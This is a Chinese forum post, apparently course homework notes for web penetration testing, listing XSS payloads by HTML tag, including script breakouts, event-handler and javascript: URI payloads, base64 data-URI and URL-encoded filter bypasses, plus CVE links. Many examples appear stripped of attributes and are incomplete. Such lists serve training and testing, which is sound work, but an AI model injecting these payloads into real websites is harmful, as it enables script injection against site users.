|
XSS 跨站脚本攻击漏洞(三)
xss-14
404'</script><script>alert(1)//
<img src=x>
xss-15
console.info("Hello" + ``+alert('XSS Attack!')+`: ${name}`);
`+alert('XSS Attack!')+`
cve-2018-13137
https://ansawaf.blogspot.com/201 ... events-manager.html
CVE-2019-8924
https://avd.aliyun.com/detail?id=AVD-2019-8924×tamp__1384=eqGxgDnD9AexylDlrmwyb%3DWDO7eGOijeD
CVE-2017-11629
https://cloud.tencent.com/developer/article/2220727
常⽤标签
0x01. a标签
<a href="javascript:alert(1)">test</a>
<a href="x" autofocus="">xss</a>
<a href="x" onclick=eval("alert('xss');")>xss</a>
<a href="x">xss</a>
<a href="x">xss</a>
0x02. img标签
<img src=x>
<img src=x onerror=eval("alert(1)")>
<img src=1>
<img src=1>
<img src=1>
0x03. iframe标签
<iframe src="javascript:alert(1)">test</iframe>
<iframe></iframe>
<iframe></iframe>
<iframe></iframe>
<iframe></iframe>
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">
0x04. audio 标签
<audio src=1 onerror=alert(1)>
<audio><source src="x"></audio>
<audio controls onfocus=eval("alert('xss');") autofocus=""></audio>
<audio controls><source src="x"></audio>
0x05. video标签
<video src=x onerror=alert(1)>
<video><source></video>
<video controls></video>
<video controls autofocus=""></video>
<video controls></video>
0x06. svg 标签
<svg onload=javascript:alert(1)>
<svg></svg>
0x07. button 标签
<button onclick=alert(1)>
<button autofocus="">xss</button>
<button>xss</button>
<button>xss</button>
<button>xss</button>
<button>xss</button>
<button></button>
0x08. div标签
这个需要借助url编码来实现绕过
原代码:
<div onmouseover='alert(1)'>DIV</div>
经过url编码:
<div onmouseover%3d'alert%26lpar%3b1%26rpar%3b'>DIV<%2fdiv>
0x09. object标签
这个需要借助 data 伪协议和 base64 编码来实现绕过
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4="></object>
0x10. script 标签
<script>alert('xss')</script>
<script>alert(/xss/)</script>
<script>alert(123)</script>
0x11. p 标签
<p>xss</p>
<p>xss</p>
<p>xss</p>
<p>xss</p>
0x12. input 标签
<input>
<input>
<input autofocus="">
<input>
<input type="text"></input>
<input type="text"></input>
<input type="text"></input>
0x13. details标签
<details></details>
<details open=""></details>
0x14. select 标签
<select autofocus></select>
<select></select>
<select onclick=eval("alert('xss');")></select>
0x15. form 标签
<form method="x" action="x"><input type=submit></form>
<form method="x" action="x"><input type=submit></form>
<form method="x" action="x"><input type=submit></form>
0x16. body 标签
<body></body>
WEB渗透测试工程师系统班250303期 第26节课作业 1. 实操课程内讲解的yakit靶场-xss篇 2. 实操课程内的其余xss靶场
|
免责声明:
1、本论坛中所有用户发布的内容仅代表作者个人观点,与本网站立场无关,本站不对其真实性、完整性或观点承担任何责任。
2、本论坛所提供的全部信息与内容,不保证其准确性、完整性或时效性。因阅读或使用本站内容而产生的任何误导、损失或风险,本站概不承担任何连带或法律责任。
3、当国家司法、行政机关依照法定程序要求本论坛披露用户信息时,本站予以配合并因此免责。
4、因网络线路故障、技术问题、不可抗力或本站无法控制的其他原因导致的服务中断或暂停,本站不承担由此造成的任何直接或间接损失。
5、对于任何通过技术手段破坏、攻击本论坛系统或扰乱正常秩序的行为,本站有权采取包括但不限于限制账号、封禁账号、追究法律责任等措施。